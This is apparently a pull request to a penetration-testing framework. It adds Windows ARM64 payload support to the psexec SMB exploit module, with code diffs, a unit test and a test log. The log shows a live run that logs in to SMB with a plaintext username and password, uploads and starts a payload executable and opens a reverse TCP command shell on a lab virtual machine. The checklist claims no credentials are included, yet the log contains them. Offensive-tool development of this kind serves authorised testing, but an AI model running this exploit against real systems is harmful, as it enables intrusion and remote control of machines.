### PR TITLE
Add AArch64 Windows target support to exploit/windows/smb/psexec

### DIFF
--- a/lib/msf/core/exploit/exe.rb
+++ b/lib/msf/core/exploit/exe.rb
@@ -98,7 +98,9 @@ module Exploit::EXE
     #Ensure opts[:arch] is an array
     opts[:arch] = [opts[:arch]] unless opts[:arch].kind_of? Array
 
-    if opts[:arch] && opts[:arch].index(ARCH_X64)
+    if opts[:arch] && opts[:arch].index(ARCH_AARCH64)
+      exe = Msf::Util::EXE.to_winaarch64pe(framework, pl, opts)
+    elsif opts[:arch] && opts[:arch].index(ARCH_X64)
       exe = Msf::Util::EXE.to_win64pe_service(framework, pl, opts)
     else
       exe = Msf::Util::EXE.to_win32pe_service(framework, pl, opts)

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -144,6 +144,11 @@ module Msf::Util::EXE
           to_win32pe_service(framework, code, exeopts)
         when ARCH_X64
           to_win64pe_service(framework, code, exeopts)
+        when ARCH_AARCH64
+          # No dedicated AArch64 service template exists yet; the loader
+          # template still runs when dropped as a "service" binary (the SCM
+          # start request just times out, as with any non-service exe).
+          to_winaarch64pe(framework, code, exeopts)
         end
       when 'exe-small'
         case arch
@@ -151,6 +156,8 @@ module Msf::Util::EXE
           to_win32pe_old(framework, code, exeopts)
         when ARCH_X64
           to_win64pe(framework, code, exeopts)
+        when ARCH_AARCH64
+          to_winaarch64pe(framework, code, exeopts)
         end
       when 'exe-only'
         case arch
@@ -165,6 +172,8 @@ module Msf::Util::EXE
           exe = to_win32pe(framework, code, exeopts)
         when ARCH_X64
           exe = to_win64pe(framework, code, exeopts)
+        when ARCH_AARCH64
+          exe = to_winaarch64pe(framework, code, exeopts)
         end
         exeopts[:uac] = true
         Msf::Util::EXE.to_exe_msi(framework, exe, exeopts)
@@ -174,6 +183,8 @@ module Msf::Util::EXE
           exe = to_win32pe(framework, code, exeopts)
         when ARCH_X64
           exe = to_win64pe(framework, code, exeopts)
+        when ARCH_AARCH64
+          exe = to_winaarch64pe(framework, code, exeopts)
         end
         Msf::Util::EXE.to_exe_msi(framework, exe, exeopts)
       when 'elf'

--- a/lib/msf/util/exe/windows/aarch64.rb
+++ b/lib/msf/util/exe/windows/aarch64.rb
@@ -8,7 +8,20 @@ module Msf::Util::EXE::Windows::Aarch64
   end
 
   module ClassMethods
+    # The size, in bytes, of the fixed `payload[]` buffer declared in
+    # data/templates/src/pe/exe/template_aarch64_windows.c (SCSIZE). Shellcode
+    # longer than this would overwrite adjacent bytes in the compiled template.
+    WINAARCH64_PAYLOAD_SPACE = 8192
+
     # Construct a Windows AArch64 PE executable with the given shellcode.
+    #
+    # Unlike the x86/x64 templates, there is currently no dedicated "service"
+    # or "dll" AArch64 template, so this loader-style template (which copies
+    # the payload into RWX memory and runs it in a new thread) is reused
+    # wherever an AArch64 PE is requested, including when a caller asked for
+    # an exe-service. That is safe for psexec-style delivery: Windows still
+    # spawns the process when the SCM start request times out because the
+    # binary doesn't speak the service control protocol.
     # to_winaarch64pe
     #
     # @param framework [Msf::Framework] The Metasploit framework instance.
@@ -26,6 +39,12 @@ module Msf::Util::EXE::Windows::Aarch64
 
       # Find the tag and inject the payload
       bo = find_payload_tag(pe, 'Invalid Windows AArch64 template: missing "PAYLOAD:" tag')
+
+      if code.length > WINAARCH64_PAYLOAD_SPACE
+        raise RuntimeError, "The Windows AArch64 EXE generator has a max size of " \
+                             "#{WINAARCH64_PAYLOAD_SPACE} bytes, please fix the calling module"
+      end
+
       pe[bo, code.length] = code.dup
       pe
     end

--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@@ -73,7 +73,11 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'PowerShell', { 'Arch' => [ARCH_X86, ARCH_X64] } ],
           [ 'Native upload', { # upload a service executable
             'Arch' => [ARCH_X86, ARCH_X64, ARCH_AARCH64],
-            'Payload' => { 'Space' => 2 ** 30 } # service executables place the payload within a segment, 1GiB is a practical max in many cases
+            # service executables place the payload within a segment, 1GiB is a practical max in many cases.
+            # AArch64 is a notable exception: it has no dedicated service template yet, so it reuses the
+            # loader template's fixed 8192-byte buffer (see Msf::Util::EXE::Windows::Aarch64::WINAARCH64_PAYLOAD_SPACE).
+            # native_upload_with_workaround rescues the resulting RuntimeError if an AArch64 payload is too big.
+            'Payload' => { 'Space' => 2 ** 30 }
           } ],
           [ 'MOF upload', { 'Arch' => [ARCH_X86, ARCH_X64, ARCH_AARCH64] } ],
           [ 'Command', { 'Arch' => [ARCH_CMD], 'Payload' => { 'Space' => 8191 } } ]
@@ -116,6 +120,13 @@ class MetasploitModule < Msf::Exploit::Remote
       smb_login
     end
     native_upload(smbshare, service_filename, service_encoder)
+  rescue RuntimeError => e
+    # generate_payload_exe_service can raise a plain RuntimeError when the
+    # encoded payload doesn't fit the target architecture's generator (e.g.
+    # AArch64's loader template is capped at 8192 bytes, well under the
+    # 1GiB this target advertises for 'Native upload'). Surface that as a
+    # normal exploit failure instead of an unhandled exception.
+    fail_with(Msf::Exploit::Failure::PayloadFailed, "#{peer} - Failed to generate the service executable: #{e.message}")
   end
 
   def validate_service_stub_encoder!

--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@@ -66,13 +66,16 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Platform' => 'win',
         'Targets' => [
-          [ 'Automatic', { 'Arch' => [ARCH_X86, ARCH_X64] } ],
+          # PowerShell isn't offered for AArch64: the PowerShell shellcode-injection
+          # wrapper (rex-powershell) only knows how to spawn x86/x64 powershell.exe,
+          # so it can't be used to run AArch64 shellcode.
+          [ 'Automatic', { 'Arch' => [ARCH_X86, ARCH_X64, ARCH_AARCH64] } ],
           [ 'PowerShell', { 'Arch' => [ARCH_X86, ARCH_X64] } ],
           [ 'Native upload', { # upload a service executable
-            'Arch' => [ARCH_X86, ARCH_X64],
+            'Arch' => [ARCH_X86, ARCH_X64, ARCH_AARCH64],
             'Payload' => { 'Space' => 2 ** 30 } # service executables place the payload within a segment, 1GiB is a practical max in many cases
           } ],
-          [ 'MOF upload', { 'Arch' => [ARCH_X86, ARCH_X64] } ],
+          [ 'MOF upload', { 'Arch' => [ARCH_X86, ARCH_X64, ARCH_AARCH64] } ],
           [ 'Command', { 'Arch' => [ARCH_CMD], 'Payload' => { 'Space' => 8191 } } ]
         ],
         'DefaultTarget' => 0,
@@ -145,7 +148,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
     case target.name
     when 'Automatic'
-      if powershell_installed?(smbshare, datastore['PSH_PATH'])
+      # The PowerShell delivery path can only launch x86/x64 powershell.exe, so
+      # an AArch64 payload has to go straight to the native upload technique.
+      if payload_instance.arch.include?(ARCH_AARCH64)
+        print_status('Selecting native target')
+        native_upload_with_workaround(smbshare)
+      elsif powershell_installed?(smbshare, datastore['PSH_PATH'])
         print_status('Selecting PowerShell target')
         execute_powershell_payload
       else

--- a/spec/lib/msf/util/exe/windows/aarch64_spec.rb
+++ b/spec/lib/msf/util/exe/windows/aarch64_spec.rb
@@ -1,0 +1,51 @@
+# -*- coding: binary -*-
+# frozen_string_literal: true
+
+require 'spec_helper'
+
+RSpec.describe Msf::Util::EXE::Windows::Aarch64 do
+  let(:template) do
+    File.expand_path('../../../../../../data/templates/template_aarch64_windows.exe', __dir__)
+  end
+
+  # The generator only tolerates payloads up to WINAARCH64_PAYLOAD_SPACE
+  # (currently 8192) bytes because that is the size of the fixed payload[]
+  # buffer compiled into template_aarch64_windows.exe. The oversize test uses
+  # 8193 bytes so any change to WINAARCH64_PAYLOAD_SPACE that widens the
+  # buffer will surface here.
+  let(:max_payload_space) { Msf::Util::EXE::Windows::Aarch64::ClassMethods::WINAARCH64_PAYLOAD_SPACE }
+
+  describe '.to_winaarch64pe' do
+    let(:payload) { 'A'.b * 32 }
+
+    let(:generated_exe) do
+      Msf::Util::EXE.to_winaarch64pe(nil, payload, template: template)
+    end
+
+    let(:template_bytes) { File.binread(template) }
+    let(:payload_offset) { template_bytes.index('PAYLOAD:') }
+
+    it 'returns a Windows PE the same size as the template' do
+      expect(generated_exe.bytesize).to eq(template_bytes.bytesize)
+      expect(generated_exe.byteslice(0, 2)).to eq('MZ')
+    end
+
+    it 'injects the shellcode at the PAYLOAD: tag offset' do
+      expect(payload_offset).not_to be_nil
+      expect(generated_exe.byteslice(payload_offset, payload.bytesize)).to eq(payload)
+    end
+
+    it 'leaves bytes before and after the payload buffer unchanged' do
+      expect(generated_exe.byteslice(0, payload_offset)).to eq(template_bytes.byteslice(0, payload_offset))
+
+      tail_offset = payload_offset + max_payload_space
+      expect(generated_exe.byteslice(tail_offset..)).to eq(template_bytes.byteslice(tail_offset..))
+    end
+
+    it 'raises when the payload exceeds the template payload buffer' do
+      oversized = 'B'.b * (max_payload_space + 1)
+      expect { Msf::Util::EXE.to_winaarch64pe(nil, oversized, template: template) }
+        .to raise_error(RuntimeError, /max size of #{max_payload_space} bytes/)
+    end
+  end
+end


### PR DESCRIPTION
## Description
We have AARCH64 shell payloads!  This adds support for them into the psexec module.

## Breaking Changes

None

## Reviewer Notes



## Verification Steps


## Test Evidence
```
msf exploit(windows/smb/psexec) > set lhost 10.5.135.210
lhost => 10.5.135.210
msf exploit(windows/smb/psexec) > set verbose true
verbose => true
msf exploit(windows/smb/psexec) > set payload windows/aarch64/shell_reverse_tcp 
payload => windows/aarch64/shell_reverse_tcp
msf exploit(windows/smb/psexec) > set smbuser msfuser
smbuser => msfuser
msf exploit(windows/smb/psexec) > set smbpass v3Mpassword
smbpass => v3Mpassword
msf exploit(windows/smb/psexec) > run
[-] Msf::OptionValidateError A SESSION or RHOST must be provided
msf exploit(windows/smb/psexec) > set rhost 10.5.132.152
rhost => 10.5.132.152
msf exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 10.5.135.210:45685 
[*] 10.5.132.152:445 - Connecting to the server...
[*] 10.5.132.152:445 - Authenticating to 10.5.132.152:445 as user 'msfuser'...
[!] 10.5.132.152:445 - peer_native_os is only available with SMB1 (current version: SMB3)
[*] 10.5.132.152:445 - Uploading payload... gSCgKTmt.exe
[*] 10.5.132.152:445 - Created \gSCgKTmt.exe...
[*] 10.5.132.152:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.132.152[\svcctl] ...
[*] 10.5.132.152:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.132.152[\svcctl] ...
[*] 10.5.132.152:445 - Obtaining a service manager handle...
[*] 10.5.132.152:445 - Creating the service...
[+] 10.5.132.152:445 - Successfully created the service
[*] 10.5.132.152:445 - Starting the service...
[*] Command shell session 1 opened (10.5.135.210:45685 -> 10.5.132.152:49985) at 2026-08-12 12:01:31 -0500
[+] 10.5.132.152:445 - Service start timed out, OK if running a command or non-service executable...
[*] 10.5.132.152:445 - Removing the service...
[+] 10.5.132.152:445 - Successfully removed the service
[*] 10.5.132.152:445 - Closing service handle...
[*] 10.5.132.152:445 - Deleting \gSCgKTmt.exe...


Shell Banner:
Microsoft Windows [Version 10.0.26200.5670]
-----
          

C:\Windows\System32>systeminfo
systeminfo

Host Name:                     DESKTOP-EKV6R5S
OS Name:                       Microsoft Windows 11 Pro Insider Preview
OS Version:                    10.0.26200 N/A Build 26200
OS Manufacturer:               Microsoft Corporation
OS Configuration:              Standalone Workstation
OS Build Type:                 Multiprocessor Free
Registered Owner:              msfuser
Registered Organization:       N/A
Product ID:                    00330-80000-00000-AA264
Original Install Date:         7/10/2025, 5:06:25 PM
System Boot Time:              8/12/2026, 8:11:56 AM
System Manufacturer:           Microsoft Corporation
System Model:                  Virtual Machine
System Type:                   ARM64-based PC
```

## Environment
```
Host Name:                     DESKTOP-EKV6R5S
OS Name:                       Microsoft Windows 11 Pro Insider Preview
OS Version:                    10.0.26200 N/A Build 26200
OS Manufacturer:               Microsoft Corporation
OS Configuration:              Standalone Workstation
OS Build Type:                 Multiprocessor Free
Registered Owner:              msfuser
Registered Organization:       N/A
Product ID:                    00330-80000-00000-AA264
Original Install Date:         7/10/2025, 5:06:25 PM
System Boot Time:              8/12/2026, 8:11:56 AM
System Manufacturer:           Microsoft Corporation
System Model:                  Virtual Machine
System Type:                   ARM64-based PC
Processor(s):                  1 Processor(s) Installed.
                               [01]: ARMv8 (64-bit) Family 8 Model D4B Revision   0 Qualcomm Technologies Inc ~2902 Mhz
BIOS Version:                  Microsoft Corporation Hyper-V UEFI Release v4.1, 9/25/2025

## AI Usage Disclosure

Claud Code


## Pre-Submission Checklist

- [ x ] No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
- [ x ] Tested on the target environment specified in the Environment section above
- [ ] Included RSpec tests for library changes _(encouraged for `lib/` changes)_
- [ x ] Read the [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and [module acceptance guidelines](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html)
